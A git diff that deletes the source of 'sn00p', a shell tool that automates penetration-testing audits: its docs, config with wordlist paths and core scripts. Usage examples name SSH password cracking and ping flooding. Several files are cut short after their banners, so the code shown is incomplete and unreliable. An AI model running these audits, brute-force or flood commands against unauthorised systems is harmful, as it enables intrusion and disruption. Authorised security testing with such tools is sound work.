- - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - Copyright (C) - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. diff --git a/automation/sn00p/source/docs/DESCR b/automation/sn00p/source/docs/DESCR deleted file mode 100644 index d99d1d7..0000000 
--- a/automation/sn00p/source/docs/DESCR +++ /dev/null @@ -1,7 +0,0 @@ -sn00p is a modular tool written in bourne shell and designed to chain and -automate security tools and tests. It parses target definitions from the command -line and runs corresponding modules afterwards. sn00p can also parse a given nmap -logfile for open tcp and udp ports. All results will be logged in specified -directories and a report can subsequently be generated. - -this code is dedicated to my friend ZELJKO, who passed away (2nd Dec 2012). diff --git a/automation/sn00p/source/docs/README b/automation/sn00p/source/docs/README deleted file mode 100644 index 2bd10be..0000000 --- a/automation/sn00p/source/docs/README +++ /dev/null @@ -1 +0,0 @@ -please use: man sn00p/docs/sn00p.1 diff --git a/automation/sn00p/source/docs/TESTED b/automation/sn00p/source/docs/TESTED deleted file mode 100644 index fa26a08..0000000 --- a/automation/sn00p/source/docs/TESTED +++ /dev/null @@ -1,14 +0,0 @@ -===> 0.6 - * arch linux 3.13.5-1 - bash 4.2.45, gnu awk 4.1.0, gnu sed 4.2.2, - gnu grep 2.18 - * solaris - - * openindiana - - * fedora 17 (3.8.4) - bash 4.2.39, gnu awk 4.0.1, gnu sed 4.2.1, - gnu grep 2.14 - * opensuse 12.3 - bash 4.2.42, gnu awk 4.0.1, gnu sed 4.2.1, gnu grep 2.14 - * ubuntu 12.10 (3.5.0-27) - dash, mawk, gnu sed 4.2.1, gnu grep 2.12 - * mac os 10.8.3 - bash 3.2.48, awk 20070501, bsd sed, bsd grep 2.5.1 - * gentoo 3.8.8 - bash 4.2.45, gnu awk 4.0.2, gnu sed 4.2.2, gnu grep 2.14 - * netbsd 6.0.1 - ksh and bash, awk 20100523, bsd sed, gnu grep 2.5.1 - * freebsd 9.1 - ksh and bash, awk 20110810, bsd sed, gnu grep 2.5.1 - * openbsd 5.2 - ksh and bash, awk 20110810, bsd sed, grep 0.9 diff --git a/automation/sn00p/source/docs/THANKS b/automation/sn00p/source/docs/THANKS deleted file mode 100644 index 8973ba4..0000000 --- a/automation/sn00p/source/docs/THANKS +++ /dev/null 
@@ -1,4 +0,0 @@
-* my wife and my son supporting me during our hard life (SIRUM EM CES!)
-* nullsecurity
-* srm
-* and to all my friends
diff --git a/automation/sn00p/source/docs/TODO b/automation/sn00p/source/docs/TODO
deleted file mode 100644
index c4e0822..0000000
--- a/automation/sn00p/source/docs/TODO
+++ /dev/null
@@ -1,84 +0,0 @@ -changelog and todo list for sn00p -================================= - -===> 0.X - * new option: saving and restoring sn00p session ........................ [] - * support 'all' value for '-i', '-I', '-x' and '-X' options ............. [] - * new option: audit services on non-default ports ....................... [] - * bugfix: 'include modules' procedure is wrong .......................... [] - * add new/more modules and audits ....................................... [] - -===> 0.8 - * re-run, re-test core and modules .................................. [DONE] - * new option: add text report style support ......................... [DONE] - * replace _print_error() with error(), warn() etc. .................. [DONE] - * man page: update and add '-c' option .............................. [DONE] - * new option: check for installed tools ............................. [DONE] - * bugfix: nmap relative path file check ............................. [DONE] - * status for 'how many targets left' ................................ [DONE] - * deleted trailing whitespaces ...................................... [DONE] - * output of tools '->' instead of '-->' ............................. [DONE] - -===> 0.7 - * 21.sh: deactivated ncftp anonymous login try ...................... [DONE] - * bugfix: added tcp and udp to modes in reports ..................... [DONE] - -===> 0.6 - * update manpage .................................................... [DONE] - * re-test sn00p core functionality .................................. [DONE] - * retest sn00p and clean up ......................................... [DONE] - * replace 'timeout' with own timeout function ................... [CANCELED] - * new options: single username and single password .................. [DONE] - * build wlan based default example module / audit ................... [DONE] - * build lan based default example module / audit .................... 
[DONE] - * added '-o' flag for mode options .................................. [DONE] - * fix: exclude modules .............................................. [DONE] - * new options: host, service, webapp and lan mode extra options ..... [DONE] - * re-written filter_port_list (replaced awk/sed with egrep) ......... [DONE] - * print how many audits left while auditing (e.g. 1/10) ............. [DONE] - * add option: timeout for modules ................................... [DONE] - * change sn00p version numbering .................................... [DONE] - * re-test sn00p on many OS .......................................... [DONE] - * replace README with manpage ....................................... [DONE] - * change description for sn00p ...................................... [DONE] - * build webapp based modules / audits ............................... [DONE] - * fix awk issues for solaris based systems .......................... [DONE] - * fix '-t' option to delete duplicated 'run_audits' call ............ [DONE] - * update host/default.sh ............................................ [DONE] - * added report style option to sn00p.conf ........................... [DONE] - * add option: support for command line target list .................. [DONE] - * refactor sn00p.sh code ............................................ [DONE] - * changed usage output .............................................. [DONE] - -===> 0.5 - * support nmap xml logfile format ................................... [DONE] - * support for -l host or -l tcp or -l udp ........................... [DONE] - * added IPsec/IKE module ............................................ [DONE] - -===> 0.4 - * generate html report .............................................. [DONE] - * added: create tcp/ and udp/ dir for ports ......................... [DONE] - * added: various netbios / rpc tests ................................ [DONE] - * added: tftp module ................................................ 
[DONE] - * added: dns cache snoop test ....................................... [DONE] - -===> 0.3 - * upgrade '-l' option (-l mod1,mod2 or -l all, etc.) ................ [DONE] - * exclude options (modules/tools) also in sn00p.conf ................ [DONE] - * option for 'include modules' ...................................... [DONE] - * option for 'include tools' ........................................ [DONE] - * build add_module option ........................................... [DONE] - * build make_module option .......................................... [DONE] - * upgrade README file ............................................... [DONE] - * comment the code .................................................. [DONE] - * change and adjust TODO file ....................................... [DONE] - -===> 0.2 - * replaced getopt with getopts ...................................... [DONE] - * option for excluding tools ........................................ [DONE] - * option for excluding modules ...................................... [DONE] - * renamed auditx to sn00p ........................................... [DONE] - * code redesign ..................................................... [DONE] - -===> 0.1 - * initial release ................................................... [DONE] diff --git a/automation/sn00p/source/docs/sn00p.1.gz b/automation/sn00p/source/docs/sn00p.1.gz deleted file mode 100644 index 483a884..0000000 Binary files a/automation/sn00p/source/docs/sn00p.1.gz and /dev/null differ diff --git a/automation/sn00p/source/sn00p.conf b/automation/sn00p/source/sn00p.conf deleted file mode 100644 index 1f23f5d..0000000 --- a/automation/sn00p/source/sn00p.conf +++ /dev/null 
@@ -1,38 +0,0 @@ -################################################################################ -# # -# sn00p config file # -# # -# NOTES: # -# - use ',' as seperator for multiple values # -# - command line options overwrite config options # -# # -################################################################################ - -# network interface -NETDEV="" - -# include modules, e.g. "host_foo,tcp_123,udp_122,web_foo,net_foo" -IN_MODULES="" - -# exclude modules, e.g. "host_foo,tcp_123,udp_122,web_foo,net_foo" -EX_MODULES="" - -# include tools, e.g. "foo,bar,baz" -IN_TOOLS="" - -# exclude tools, e.g. "foo,bar,baz" -EX_TOOLS="openssl_connect,http_nikto,https_nikto" - -# single username -USER="" - -# single password -PASS="" - -# username lists -USERLISTS="/home/noptrix/haxx/own/wordlist/user/default.txt" - -# password lists -PASSLISTS="/home/noptrix/haxx/own/wordlist/pass/default.txt" - -# EOF diff --git a/automation/sn00p/source/src/core/audit.sh b/automation/sn00p/source/src/core/audit.sh deleted file mode 100644 index 95e3fb3..0000000 --- a/automation/sn00p/source/src/core/audit.sh +++ /dev/null 
@@ -1,473 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${tool}" - done - done - - return ${SUCCESS} -} - - -# list audits from host, tcp, udp, net or web -list_audit_dir() -{ - for i in `ls ${list}/*` - do - tools=`awk '/^do_[a-zA-Z0-9_()]/ {sub("do_",""); print}' ${i} | - sed 's/()//'` - - msg "\n[*] ${i}" - - for tool in ${tools} - do - echo " -> ${tool}" - done - done - - return ${SUCCESS} -} - - -# list audits from selected modules -list_audit_mod() -{ - list=`echo ${list} | tr ',' ' ' | tr '_' '/'` - - for i in ${list} - do - if [ -f "${i}.sh" ] - then - tools=`awk '/^do_[a-zA-Z0-9_()]/ {sub("do_",""); print}' \ - "${i}.sh" | sed 's/()//'` - - msg "\n[*] ${i}.sh" - - for tool in ${tools} - do - echo " -> ${tool}" - done - else - error "module ${i}.sh does not exist" - fi - done - - return ${SUCCESS} -} - - -# list available audits from modules -list_audits() -{ - cd "${SN00P_PATH}/src/modules" - - if [ "${list}" = "all" ] - then - list_audit_all - elif [ "${list}" = "host" -o "${list}" = "tcp" -o "${list}" = "udp" \ - -o "${list}" = "web" -o "${list}" = "lan" -o "${list}" = "wlan" ] - then - list_audit_dir - else - list_audit_mod - fi - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# run tcp or udp based audits -service_audits() -{ - # for status - i=${num_targets} - j=${cur_target} - - mkdir "${protocol}" > ${VERBOSE} 2>&1 - - # run audits for each port/service - for port in `cat ${portlist}` - do - dport="${port}" - - if [ ! 
-d ${port} ] - then - mkdir "${protocol}/${port}" > ${VERBOSE} 2>&1 - fi - - cd "${protocol}/${port}" - - # run default.sh module first - msg "[*] auditing ${host}:${port} [${protocol} default.sh]"\ - "(${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${protocol}/default.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" "${dmac}" \ - "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" "${bssid}" \ - "${url}" "${user}" "${pass}" "${ulists}" "${plists}" \ - "${cookie}" "${in_tools}" "${ex_tools}" "${VERBOSE}" - echo "" - - # now run specified modules - if [ -f "${SN00P_PATH}/src/modules/${protocol}/${port}.sh" ] - then - msg "[*] auditing ${host}:${port} [${protocol} ${port}.sh]"\ - "(${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${protocol}/${port}.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" \ - "${dmac}" "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" \ - "${bssid}" "${url}" "${user}" "${pass}" "${ulists}" \ - "${plists}" "${cookie}" "${in_tools}" "${ex_tools}" \ - "${VERBOSE}" - echo "" - fi - - # back to target dir - cd "../../" - done - - return ${SUCCESS} -} - - -# user included modules for host tests -user_audits() -{ - # for status - i=${num_targets} - j=${cur_target} - - for mod in ${in_mods} - do - if echo "${in_mods}" | grep "default" > ${VERBOSE} 2>&1 - then - # we do not need to run default.sh again - delete 'default' - in_mods=`echo ${in_mods} | sed 's/default//g'` - continue - fi - if [ -f "${SN00P_PATH}/src/modules/${atype}/${mod}.sh" ] - then - if [ ! 
-d "${mod}" ] - then - mkdir ${mod} - fi - - cd ${mod} - - msg "[*] auditing ${host} [${atype} ${mod}.sh] (${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${atype}/${mod}.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" \ - "${dmac}" "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" \ - "${bssid}" "${url}" "${user}" "${pass}" "${ulists}" \ - "${plists}" "${cookie}" "${in_tools}" "${ex_tools}" \ - "${VERBOSE}" - echo "" - - # back to ${atype}/ - cd "../" - else - warn "module ${mod} does not exist" - fi - done - - return ${SUCCESS} -} - - -# user did not include modules, so all available modules will be run -all_audits() -{ - # for status - i=${num_targets} - j=${cur_target} - - # run audit for each module - for mod in ${modules} - do - # exclude modules if chosen - if ! echo "${ex_mods}" | grep ${mod} > ${VERBOSE} 2>&1 - then - if [ ! -d "${mod}" ] - then - mkdir ${mod} - fi - - cd ${mod} - - if [ "${mod}" != "default" ] - then - msg "[*] auditing ${host} [${atype} ${mod}.sh] (${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${atype}/${mod}.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" \ - "${dmac}" "${rhost}" "${rport}" "${rmac}" "${ndev}" \ - "${ssid}" "${bssid}" "${url}" "${user}" "${pass}" \ - "${ulists}" "${plists}" "${cookie}" "${in_tools}" \ - "${ex_tools}" "${VERBOSE}" - echo "" - fi - - # back to ${atype}/ - cd "../" - fi - done - - return ${SUCCESS} -} - - -# define to include and to exclude modules by given audit type -define_modules() -{ - if [ ${atype} = "host" ] - then - in_mods="${in_host_mods}" - ex_mods="${ex_host_mods}" - elif [ ${atype} = "web" ] - then - in_mods="${in_web_mods}" - ex_mods="${ex_web_mods}" - elif [ ${atype} = "lan" ] - then - in_mods="${in_lan_mods}" - ex_mods="${ex_lan_mods}" - elif [ ${atype} = "wlan" ] - then - in_mods="${in_wlan_mods}" - ex_mods="${ex_wlan_mods}" - else - return ${SUCCESS} - fi - - return ${SUCCESS} -} - - -# run default 
audits first and then user or all audits for given audit type -audit() -{ - # for status - i=${num_targets} - j=${cur_target} - - # audit type - atype="${1}" - - # read in all available modules for given audit type - modules="`ls ${SN00P_PATH}/src/modules/${atype} | sed 's/\.sh//g'`" - - if [ ! -d "${atype}" ] - then - mkdir ${atype} - fi - - if [ ! -d "${atype}/default" ] - then - mkdir "${atype}/default" - fi - - cd "${atype}/default" - - define_modules "${atype}" - - # run default.sh first - msg "[*] auditing ${target} [${atype} default.sh] (${j}/${i})" - ${_TIMEOUT} ${MOD_TIMEOUT} \ - sh "${SN00P_PATH}/src/modules/${atype}/default.sh" \ - "${shost}" "${sport}" "${smac}" "${dhost}" "${dport}" "${dmac}" \ - "${rhost}" "${rport}" "${rmac}" "${ndev}" "${ssid}" "${bssid}" \ - "${url}" "${user}" "${pass}" "${ulists}" "${plists}" "${cookie}" \ - "${in_tools}" "${ex_tools}" "${VERBOSE}" - echo "" - - # back to audit type directory - cd "../" - - if [ "${in_mods}" != "NONE" ] - then - # user chosed modules to include - user_audits - else - all_audits - fi - - # back to target directory - cd "../" - - return ${SUCCESS} -} - - -# run lan / wlan based audits -run_net_audits() -{ - # for stat line - num_targets="`echo ${urls} | tr -s ' ' '\n' | wc -l`" - cur_target=0 - - echo "" - - # grep network type from table list first - for netif in ${netifs} - do - net_type="`grep "${netif}" ${table_list} | cut -d ' ' -f 1`" - ndev="${netif}" - target="${ndev}" - cur_target=`expr ${cur_target} + 1` - - cd ${target} - - if [ ${net_type} = "lan" ] - then - audit "lan" - elif [ ${net_type} = "wlan" ] - then - audit "wlan" - else - return ${FAILURE} - fi - - # back to sn00p log dir - cd "../" - done - - return ${SUCCESS} -} - - -# get http or https port for webapp based audits -get_url_port() -{ - protocol="`echo ${url} | cut -d ':' -f 1`" - - if [ "${protocol}" = "http" ] - then - port="80" - elif [ "${protocol}" = "https" ] - then - port="443" - else - error "unknown web protocol" - fi 
- - return ${SUCCESS} -} - - -# run webapp based audits -run_web_audits() -{ - # for stat line - num_targets="`echo ${urls} | tr -s ' ' '\n' | wc -l`" - cur_target=0 - - echo "" - - # get all available web modules - modules=`ls ${SN00P_PATH}/src/modules/web/ | sed 's/\.sh//g'` - - # run audits for each $url - for url in ${urls} - do - target="${url}" - cur_target=`expr ${cur_target} + 1` - - # make url to host format and create host directory - host="`echo ${url} | cut -d '/' -f 3 | tr -d ';,?='`" - mkdir -p "${host}/web/default/" > ${VERBOSE} 2>&1 - cd ${host} - - # http or https? - get_url_port - - # run default.sh module first - audit "web" - - # back to sn00p log dir - cd "../" - done - - return ${SUCCESS} -} - - -# run host audits -run_host_audits() -{ - # for stat line - num_targets="`echo ${hosts} | tr -s ' ' '\n' | wc -l`" - cur_target=0 - - echo "" - - # run host, tcp and udp based audits - for host in ${hosts} - do - target="${host}" - dhost="${host}" - cur_target=`expr ${cur_target} + 1` - - # change to target dir and get service protocol if available - cd ${host} - protocol="`ls *_port.lst 2> ${VERBOSE} | cut -d '_' -f 1`" - - # host based audits - audit "host" - - # protocol / service based audits - if [ "${protocol}" ] - then - service_audits - fi - - # back to sn00p log dir - cd "../" - done - - return ${SUCCESS} -} - - -# EOF diff --git a/automation/sn00p/source/src/core/check.sh b/automation/sn00p/source/src/core/check.sh deleted file mode 100644 index 465c622..0000000 --- a/automation/sn00p/source/src/core/check.sh +++ /dev/null 
@@ -1,361 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- /dev/null`" - done - - t=`echo ${t} | wc -w` - - if [ ${t} -eq 0 ] - then - echo " -> ${tool} not found" - fi - - t="" - done - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# check syntax for report styles -check_report_style() -{ - if [ ${report_style} != "html" -a ${report_style} != "txt" ] - then - error "wrong report style. choose 'html' or 'txt'" - fi - - return ${SUCCESS} -} - - -# check syntax for extra mode options -check_mode_opts() -{ - if [ "${mode_opts}" = '?' ] - then - print_mode_opts_syntax - fi - - return ${SUCCESS} -} - - -# check syntax for (w)lan mode options -check_lan_mode_opts() -{ - if [ "${net_list}" = '?' ] - then - print_lan_mode_syntax - fi - - return ${SUCCESS} -} - - -# check syntax for web mode options -check_web_mode_opts() -{ - if [ "${urls}" = '?' ] - then - print_web_mode_syntax - fi - - return ${SUCCESS} -} - - -# check syntax for host mode options -check_host_mode_opts() -{ - if [ "${target_list}" = '?' ] - then - print_host_mode_syntax - fi - - return ${SUCCESS} -} - - -# check target protocol (tcp, udp) -check_protocol() -{ - msg "[*] checking network protocol" > ${VERBOSE} 2>&1 - - if [ "${protocol}" != "tcp" -a "${protocol}" != "udp" ] - then - error "unknown protocol" - fi - - return ${SUCCESS} -} - - -# check for module directory prefix -check_mod_prefix() -{ - modprefix="host/ tcp/ udp/ web/ lan/ wlan/" - - msg "[*] checking module prefix" > ${VERBOSE} 2>&1 - - for mod in ${modprefix} - do - if echo "${2}" | grep "${mod}" > /dev/null - then - return ${SUCCESS} - fi - done - - # module prefix was wrong, exiting ... - error "wrong module prefix" - - return ${SUCCESS} -} - - -# check arguments for add_audit() -check_add_audit_args() -{ - if [ ${2} = '?' 
]
- then
- print_add_audit_syntax
- fi
-
- if [ ${#} -lt 3 ]
- then
- echo "[-] ERROR: wrong syntax"
- exit ${FAILURE}
- fi
-
- check_mod_prefix ${*}
-
- return ${SUCCESS}
-}
-
-
-# check arguments for make_module()
-check_make_mod_args()
-{
- if [ ${2} = '?' ]
- then
- print_create_mod_syntax
- fi
-
- if [ ${#} -lt 3 ]
- then
- echo "[-] ERROR: wrong syntax"
- exit ${FAILURE}
- fi
-
- check_mod_prefix ${*}
-
- return ${SUCCESS}
-}
-
-
-# check if sn00p directory already exists
-check_sn00p_dir()
-{
- # new sn00p directory
- sn00p_dir="sn00p-`date +%F`"
-
- msg "[*] checking sn00p directory" > ${VERBOSE} 2>&1
-
- if [ -d ${sn00p_dir} ]
- then
- error "sn00p dir already exists"
- fi
-
- return ${SUCCESS}
-}
-
-
-# check if file is a valid nmap grepable or xml logfile
-check_logfile()
-{
- msg "[*] checking for nmap logfile" > ${VERBOSE} 2>&1
-
- if [ -f ${logfile} ]
- then
- nmap_valid=`head -1 ${logfile} | cut -d " " -f 1-2`
-
- if [ "${nmap_valid}" = "# Nmap" ]
- then
- nmap_grepable=`head -n 1 ${logfile} | grep "\-oG"`
-
- if [ -z "${nmap_grepable}" ]
- then
- error "${logfile} is not a grepable nmap logfile"
- fi
- elif [ "${nmap_valid}" = '' ]
- then
- usexml="1"
- else
- error "${logfile} not a nmap logfile"
- fi
- else
- error "${logfile} is not a regular file!"
- fi
-
- return ${SUCCESS}
-}
-
-
-# check for uid 0 (root)
-check_uid()
-{
- msg "[*] checking user id" > ${VERBOSE} 2>&1
-
- if [ `whoami` != "root" ]
- then
- warn "you are not root"
- fi
-
- return ${SUCCESS}
-}
-
-
-# check command line arguments selected by user
-check_args()
-{
- msg "[*] checking arguments" > ${VERBOSE} 2>&1
-
- if [ -z "${logfile}" ]
- then
- if [ -z "${target_list}" ]
- then
- if [ -z "${urls}" ]
- then
- if [ -z "${net_list}" ]
- then
- error "WTF?
mount /dev/brain"
- fi
- fi
- fi
- fi
-
- return ${SUCCESS}
-}
-
-
-# check argument count
-check_argc()
-{
- if [ ${#} -lt 2 ]
- then
- error "-H for help and usage"
- fi
-
- return ${SUCCESS}
-}
-
-
-# checks sed version and sets '-E' or '-r' option for given OS
-check_sed_version()
-{
- msg "[*] checking sed version" > ${VERBOSE} 2>&1
-
- sed -h 2> "sedtest.txt"
- sedhead=`head -n 1 "sedtest.txt" | cut -d " " -f 2`
-
- if [ "${sedhead}" = "invalid" ]
- then
- # GNU sickness
- _sed="sed -r"
- else
- _sed="sed -E"
- fi
-
- rm -rf "${BEGIN_PATH}/sedtest.txt" > ${VERBOSE} 2>&1
-
- return ${SUCCESS}
-}
-
-
-# set echo options for given OS
-check_echo()
-{
- if grep "Debian" "/proc/version" > ${VERBOSE} 2>&1
- then
- ECHO_OPTS=""
- elif grep "Ubuntu" "/proc/version" > ${VERBOSE} 2>&1
- then
- ECHO_OPTS=""
- elif [ `uname` = "SunOS" ]
- then
- ECHO_OPTS=""
- elif [ `uname` = "Darwin" ]
- then
- ECHO_OPTS=""
- else
- ECHO_OPTS="-e"
- fi
-
- return ${SUCCESS}
-}
-
-
-# check if timeout is installed. if not, unset $_TIMEOUT (see global.h).
-check_timeout_cmd()
-{
- cmd="`timeout --help 2> /dev/null | grep "^Usage"`"
-
- msg "[*] checking timeout command" > ${VERBOSE} 2>&1
-
- if [ -z "${cmd}" ]
- then
- warn "timeout command not found. -T option will be ignored"
- _TIMEOUT=""
- MOD_TIMEOUT=""
- fi
-
- return ${SUCCESS}
-}
-
-# EOF
diff --git a/automation/sn00p/source/src/core/getopt.sh b/automation/sn00p/source/src/core/getopt.sh
deleted file mode 100644
index 36ac1d9..0000000
--- a/automation/sn00p/source/src/core/getopt.sh
+++ /dev/null
@@ -1,108 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - # delete nmap logfile - if [ -f "${BEGIN_PATH}/${sn00p_dir}/${logfile}" ] - then - rm -rf ${BEGIN_PATH}/${sn00p_dir}/${logfile} > ${VERBOSE} 2>&1 - fi - - # delete temp-port list files - rm -rf ${BEGIN_PATH}/${sn00p_dir}/tmp_* > ${VERBOSE} 2>&1 - - # delete port list files - rm -rf ${BEGIN_PATH}/${sn00p_dir}/*/*_port.lst > ${VERBOSE} 2>&1 - - # delete table.lst - rm -rf ${BEGIN_PATH}/${sn00p_dir}/table.lst > ${VERBOSE} 2>&1 - - return ${SUCCESS} -} - - -# print syntax of arguments for 'add audit' option -print_add_audit_syntax() -{ - echo "[*] syntax:" - echo " -> [cmd] [cmd_args]" - echo "[*] example:" - echo " -> tcp/22.sh crack_ssh sshcracker -c foo -f bar" - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for 'create module' option -print_create_mod_syntax() -{ - echo "[*] syntax:" - echo " -> [cmd] [cmd_args]" - echo "[*] example:" - echo " -> tcp/1337.sh ping_flood killahping -s 9999" - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax and options for mode options -print_mode_opts_syntax() -{ - echo "[*] syntax:" - echo " -> '[=];...;[opt-N=,]'" - echo "[*] options:" - echo " -> shost - source host" - echo " -> sport - source port" - echo " -> smac - source macaddr" - echo " -> dhost - target host" - echo " -> dport - target port" - echo " -> dmac - target macaddr" - echo " -> rhost - router host" - echo " -> rport - router port" - echo " -> rmac - router macaddr" - echo " -> ndev - network interface" - echo " -> ssid - wifi ssid" - echo " -> bssid - wifi bssid" - echo " -> cookie - web cookie" - echo " -> user - single username" - echo " -> pass - single password" - echo " -> ulists - username lists" - echo " -> plists - password lists" - echo "[*] example:" - echo " -> 
'rhost=192.168.0.1;sport=1337;ndev=em0," - echo " dmac=aa:bb:cc:dd:ee:ff;ssid=nullsex;ulists=/tmp/users.lst;" - echo " plists=/home/haxor/pass.lst,pass2.lst'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for (w)lan mode -print_lan_mode_syntax() -{ - echo "[*] syntax:" - echo " -> '://;...'" - echo "[*] example:" - echo " -> 'lan://eth0;wlan://wlan0'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for webapp mode -print_web_mode_syntax() -{ - echo "[*] syntax:" - echo " -> ',...,'" - echo "[*] example:" - echo " -> 'http://nullsecurity.net/,http://localhost'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# print syntax of arguments for host mode -print_host_mode_syntax() -{ - echo "[*] syntax:" - echo " -> '://:,...,;...'" - echo "[*] example:" - echo " -> 'udp://nullsecurity.net:514,161;tcp://google.com/'" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# create sn00p dir and change the working dir -make_sn00p_dir() -{ - msg "[*] making sn00p dir" > ${VERBOSE} 2>&1 - - mkdir ${sn00p_dir} > ${VERBOSE} 2>&1 - - if [ ${logfile} ] - then - cp ${logfile} ${sn00p_dir} > ${VERBOSE} 2>&1 - logfile="`basename ${sn00p_dir}/${logfile}`" - fi - - cd ${sn00p_dir} - - return ${SUCCESS} -} - - -# very important, leet banner -banner() -{ - msg "--==[ sn00p by noptrix@nullsecurity.net ]==--" - - return ${SUCCESS} -} - - -# usage and help -usage() -{ - msg "usage:\n" - msg " sn00p.sh [options] | " - msg "\nmodes:\n" - msg " -s - target hosts and ports - ? to print syntax" - msg " -f - nmap xml or grepable logfile" - msg " -w - urls for webapp audits - ? to print syntax" - msg " -n - network type and devices for (w)lan audits" - msg " - ? to print syntax" - msg "\noptions:\n" - msg " -o - extra mode options - ? 
to print syntax" - msg " -i - include modules (default: all)" - msg " -I - include tools and tests (default: all)" - msg " -x - exclude modules (default: none)" - msg " -X - exclude tools or tests (default: none)" - msg " -T - timeout between each module (default: none)" - msg " -r - generate html or text report" - msg " -v - verbose mode (default: quiet)" - msg "\nmisc:\n" - msg " -c - check for missing tools (recommended)" - msg " -l - print all or specified audits and exit" - msg " -m - create a module - ? to print syntax" - msg " -t - add audit to existing module - ? to print syntax" - msg " -H - print this help" - msg " -V - print version number" - msg "\nexamples:\n" - msg " sn00p.sh -s 'udp://nullsecurity.net:514,161;tcp://google.com:80'" - msg " sn00p.sh -f /home/haxor/foo.nmap -w 'http://localhost' -r html" - msg " sn00p.sh -f nmap/foo.nmap -i tcp_1337 -I netcat,domain,amap -v" - msg " sn00p.sh -n 'lan://eth0' -o 'rhost=192.168.0.1;sport=1337'" - msg " sn00p.sh -l tcp_1337,host_zonetransfer,udp" - msg " sn00p.sh -m tcp/1337.sh ping_flood killahping -s 9999" - msg " sn00p.sh -t tcp/22.sh crack_ssh sshcracker -c arg -f arg" - - return ${SUCCESS} -} - - -# print line -msg() -{ - echo ${ECHO_OPTS} "${@}" - - return ${SUCCESS} -} - - -# print warning -warn() -{ - echo ${ECHO_OPTS} "[!] WARNING: ${@}" > /dev/stderr - - return ${SUCCESS} -} - - -# print error and exit -error() -{ - echo ${ECHO_OPTS} "[-] ERROR: ${@}" > /dev/stderr - exit ${FAILURE} - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/core/module.sh b/automation/sn00p/source/src/core/module.sh deleted file mode 100644 index 2e0f2f6..0000000 --- a/automation/sn00p/source/src/core/module.sh +++ /dev/null 
@@ -1,205 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - if [ ! -f ${modfile} ] - then - error "${2} does not exist" - fi - - # delete "# go go go, run_audits and # EOF" lines - ${_sed} '/(\$)|(# go go go$)|(# EOF)/d' \ - "${SN00P_PATH}/src/modules/${2}" | sed '$d' > ${tmpfile} - - # add audit here - echo "# " >> ${tmpfile} - echo "do_${3}()" >> ${tmpfile} - echo "{" >> ${tmpfile} - echo " ${@} 2>&1" | echo " `cut -d " " -f 8-`" >> ${tmpfile} - echo "" >> ${tmpfile} - echo ' return ${SUCCESS}' >> ${tmpfile} - echo "}" >> ${tmpfile} - msg "\n\n# go go go\nrun_audits\n\n# EOF" >> ${tmpfile} - - # move and replace file with original - mv ${tmpfile} ${modfile} > ${VERBOSE} 2>&1 - - msg "[*] added audit ${3} to ${2}" - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# create own modules from command line -make_module() -{ - modfile="${SN00P_PATH}/src/modules/${2}" - mod="`echo ${2} | cut -d '/' -f 1`" - num_lines="-119" - - msg "[*] creating module" > ${VERBOSE} 2>&1 - - if [ -f ${modfile} ] - then - error "${2} exists" - fi - - # copy first ${num_lines} lines from ${mod}/default.sh - head ${num_lines} "${SN00P_PATH}/src/modules/${mod}/default.sh" | - ${_sed} 's/DEFAULT/\/; - s/TCP|UDP|WEB|LAN|WLAN/\/' > ${modfile} - - # create module here - echo "# " >> ${modfile} - echo "do_${3}()" >> ${modfile} - echo "{" >> ${modfile} - echo " 